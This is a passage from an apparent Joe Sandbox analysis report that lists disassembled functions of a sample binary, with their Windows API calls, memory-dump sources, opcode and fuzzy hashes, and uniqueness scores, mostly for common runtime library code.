                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog_swprintf
                                                                                        • String ID: CMT$h%u$hc%u
                                                                                        • API String ID: 146138363-3282847064
                                                                                        • Opcode ID: 1929cdbeec668f6550241cc6775bc11f1f15d0d91fbbdf734f1fa67ca8e5a630
                                                                                        • Instruction ID: bb0a140c8574d68a9bfe5ab402b53c63367ee23ed4ce000f91a3d293616e21c3
                                                                                        • Opcode Fuzzy Hash: 1929cdbeec668f6550241cc6775bc11f1f15d0d91fbbdf734f1fa67ca8e5a630
                                                                                        • Instruction Fuzzy Hash: AB32D6715143849FDF16DF74C895AEA3BA5AF15300F08847DFD8A8F28ADB749A49CB20
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00362874
                                                                                        • _strlen.LIBCMT ref: 00362E3F
                                                                                          • Part of subcall function 003702BA: __EH_prolog.LIBCMT ref: 003702BF
                                                                                          • Part of subcall function 00371B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0036BAE9,00000000,?,?,?,00010420), ref: 00371BA0
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00362F91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                        • String ID: CMT
                                                                                        • API String ID: 1206968400-2756464174
                                                                                        • Opcode ID: 234f2cc8a8809684306c40af38ff8f9b87da435e14b2703cdd8b9863459b3f4a
                                                                                        • Instruction ID: d5c001998c3061f9b24ddc0f996a5fc3f251ec19454517dfdaeeafc81a8a52ab
                                                                                        • Opcode Fuzzy Hash: 234f2cc8a8809684306c40af38ff8f9b87da435e14b2703cdd8b9863459b3f4a
                                                                                        • Instruction Fuzzy Hash: 9B6227715006448FDB1ADF38C8966FA3BA1EF55300F09C47EEC9A8F28ADB759945CB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0037F844
                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0037F910
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0037F930
                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0037F93A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                        • String ID:
                                                                                        • API String ID: 254469556-0
                                                                                        • Opcode ID: 6a308b0ac098624afcdfd044da487debd3fb0f3bace67edc213ce3488a8362c3
                                                                                        • Instruction ID: b24af11cee9d846d08aeeae125d6f8bcb34ebc56a5e067c578b1de17f0012201
                                                                                        • Opcode Fuzzy Hash: 6a308b0ac098624afcdfd044da487debd3fb0f3bace67edc213ce3488a8362c3
                                                                                        • Instruction Fuzzy Hash: 31311AB5D05219DFDB21EFA4D9897CDBBB8BF04304F1040AAE50CAB250EB759B848F45
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualQuery.KERNEL32(80000000,0037E5E8,0000001C,0037E7DD,00000000,?,?,?,?,?,?,?,0037E5E8,00000004,003C1CEC,0037E86D), ref: 0037E6B4
                                                                                        • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0037E5E8,00000004,003C1CEC,0037E86D), ref: 0037E6CF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoQuerySystemVirtual
                                                                                        • String ID: D
                                                                                        • API String ID: 401686933-2746444292
                                                                                        • Opcode ID: 6ed878d60b388919a502a8f4ac07d877adadd373acafe6b7175f82531e6fbafb
                                                                                        • Instruction ID: 2b8fb05748abead62fe0d416e77b48996d2d1be235aecf1756d1a7c6145b4b72
                                                                                        • Opcode Fuzzy Hash: 6ed878d60b388919a502a8f4ac07d877adadd373acafe6b7175f82531e6fbafb
                                                                                        • Instruction Fuzzy Hash: DA01F77260010D6BDB24DE29DC09BDD7BAAAFC8329F0DC161ED1DD7154D638D9058680
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00388EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00388FB5
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00388FBF
                                                                                        • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00388FCC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                        • String ID:
                                                                                        • API String ID: 3906539128-0
                                                                                        • Opcode ID: 66d6714bdccf70de9963b125615f882985497ed93a6fcd5142ba76a285921a40
                                                                                        • Instruction ID: 040a6fe47325f5c364534f76c2c2bc3ebffdbd0dfc27cc14ec06d586a77e5c40
                                                                                        • Opcode Fuzzy Hash: 66d6714bdccf70de9963b125615f882985497ed93a6fcd5142ba76a285921a40
                                                                                        • Instruction Fuzzy Hash: CF31C8759013189BCB22DF64DC8979DBBB8BF08310F5041EAE41CA7250EB759F858F44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0038D440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                        • Instruction ID: 6cfbd4251c47ee5fbd4f20dcd2e9f0ca8d9a5e4de5d63df66b5748d927bf6c80
                                                                                        • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                        • Instruction Fuzzy Hash: 99021C71E002199FDF15DFA9D8806ADB7F1EF48314F2581AAE919EB384D731AD418B90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0037AF35
                                                                                        • GetNumberFormatW.KERNEL32(00000400,00000000,?,0039E72C,?,?), ref: 0037AF84
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: FormatInfoLocaleNumber
                                                                                        • String ID:
                                                                                        • API String ID: 2169056816-0
                                                                                        • Opcode ID: 93c7a477ad51ec3486f4c689353bc1f8cc2b71528e55440a55025c340598d432
                                                                                        • Instruction ID: 78598a27b9ceafb58ce985fa673382e465eb1b2023a26af5459a2cce98db0376
                                                                                        • Opcode Fuzzy Hash: 93c7a477ad51ec3486f4c689353bc1f8cc2b71528e55440a55025c340598d432
                                                                                        • Instruction Fuzzy Hash: DA01717A140308AEDB12DFA4EC45F9A77BCEF08714F009022FB0597161D3709955CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00366C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00366DDF,00000000,00000400), ref: 00366C74
                                                                                        • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00366C95
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFormatLastMessage
                                                                                        • String ID:
                                                                                        • API String ID: 3479602957-0
                                                                                        • Opcode ID: 1ac342a1041ee9e54f965cf7aa5042beea3c3f2cbdbaa9ae51da631a984920ab
                                                                                        • Instruction ID: 03283c36bf37d9575419021758afd39c49ad9d3911834df43911fdf883e8c573
                                                                                        • Opcode Fuzzy Hash: 1ac342a1041ee9e54f965cf7aa5042beea3c3f2cbdbaa9ae51da631a984920ab
                                                                                        • Instruction Fuzzy Hash: BBD0C971344300BFFA120B628D07F6A7B9DBF45B91F18C405B796E80E0CAB59824E629
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 003919F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,003919EF,?,?,00000008,?,?,0039168F,00000000), ref: 00391C21
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionRaise
                                                                                        • String ID:
                                                                                        • API String ID: 3997070919-0
                                                                                        • Opcode ID: 3283fdd830d173904365d9335fb382139cff537d0f2b35a4bf45603fca56eff1
                                                                                        • Instruction ID: 325c1d1a1ea818dc26eda27474ba45dfbc873fb374cb532af60ccecc94643b4d
                                                                                        • Opcode Fuzzy Hash: 3283fdd830d173904365d9335fb382139cff537d0f2b35a4bf45603fca56eff1
                                                                                        • Instruction Fuzzy Hash: D8B15C3521060A9FDB16CF28C48AB657BE1FF45364F268698E89ADF2A1C335DD91CB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0037F66A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: FeaturePresentProcessor
                                                                                        • String ID:
                                                                                        • API String ID: 2325560087-0
                                                                                        • Opcode ID: 8c62e40cc93066ae0c2d07b025f3d179857e19ad523e9703f4b969a1eeaf874e
                                                                                        • Instruction ID: fd9dc0d7806cd7906a3a9fa1bfffe9e09883ed2ac0b642939ae185f2c9d1cb65
                                                                                        • Opcode Fuzzy Hash: 8c62e40cc93066ae0c2d07b025f3d179857e19ad523e9703f4b969a1eeaf874e
                                                                                        • Instruction Fuzzy Hash: 565181B1900605CFEB2ACF94D8857AAB7F8FB48354F25853AD409EB251D379ED00CB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetVersionExW.KERNEL32(?), ref: 0036B16B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Version
                                                                                        • String ID:
                                                                                        • API String ID: 1889659487-0
                                                                                        • Opcode ID: 77159750ef7042ea409a16a5fe08df56fb97761f7a5cfd1c7c4ba7cb1b35c5b1
                                                                                        • Instruction ID: d0c2502b561adab96f36d38a5d89da72d4ca0b7aa0635bf75f4bc2e0e0a09324
                                                                                        • Opcode Fuzzy Hash: 77159750ef7042ea409a16a5fe08df56fb97761f7a5cfd1c7c4ba7cb1b35c5b1
                                                                                        • Instruction Fuzzy Hash: FFF03AB4E00218DFDB1ACB18EC926DA73F9FB8A315F114296D91693390C3B0A9C48E60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 003640FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: gj
                                                                                        • API String ID: 0-4203073231
                                                                                        • Opcode ID: 1c0119179a0c39568eedd5dcd26acf785502266cc17353ed66d5867a59e64076
                                                                                        • Instruction ID: b1ae66b1c1048837e7a341d1219d59ea3c84150f310991fbf1baa53e54282874
                                                                                        • Opcode Fuzzy Hash: 1c0119179a0c39568eedd5dcd26acf785502266cc17353ed66d5867a59e64076
                                                                                        • Instruction Fuzzy Hash: 89C137B6A183418FC354CF29D89065AFBE1BFC8308F19892DE998D7311D734E949CB96
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0037F3A5), ref: 0037F9DA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: ab92d4b5e61dc3e3e5092995adf1aa0459d0e4d48163b0d351d87645208842d9
                                                                                        • Instruction ID: 1792c0a2e0302bc17e3b88a26aec8b67dd7a7b01ccd496880558769e347e56ba
                                                                                        • Opcode Fuzzy Hash: ab92d4b5e61dc3e3e5092995adf1aa0459d0e4d48163b0d351d87645208842d9
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0038C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapProcess
                                                                                        • String ID:
                                                                                        • API String ID: 54951025-0
                                                                                        • Opcode ID: c1464a5fc37cf73e9433e0a4546573eaff93edd5ba7f9e5ecb3edb1e34220da2
                                                                                        • Instruction ID: 9ab79297a62fbc30280236ab9e85274a915ab427ccad4bba9e23498551e69d84
                                                                                        • Opcode Fuzzy Hash: c1464a5fc37cf73e9433e0a4546573eaff93edd5ba7f9e5ecb3edb1e34220da2
                                                                                        • Instruction Fuzzy Hash: 99A011B02022008B83028F30AE08A0A3AACAA00380B08002BA00AC0030EAA088A0AB00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 003762CA Relevance: .8, Instructions: 829COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                                                        • Instruction ID: b3995e20b677407f7601c1f8f831700854c91e2e52fe41cec7e34f26fa9fb912
                                                                                        • Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                                                        • Instruction Fuzzy Hash: 9C62F771604B859FCB26CF28C4A16B9BBE1AF95304F09C96DD8DE8B742D738E944CB11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 003777EF Relevance: .8, Instructions: 817COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
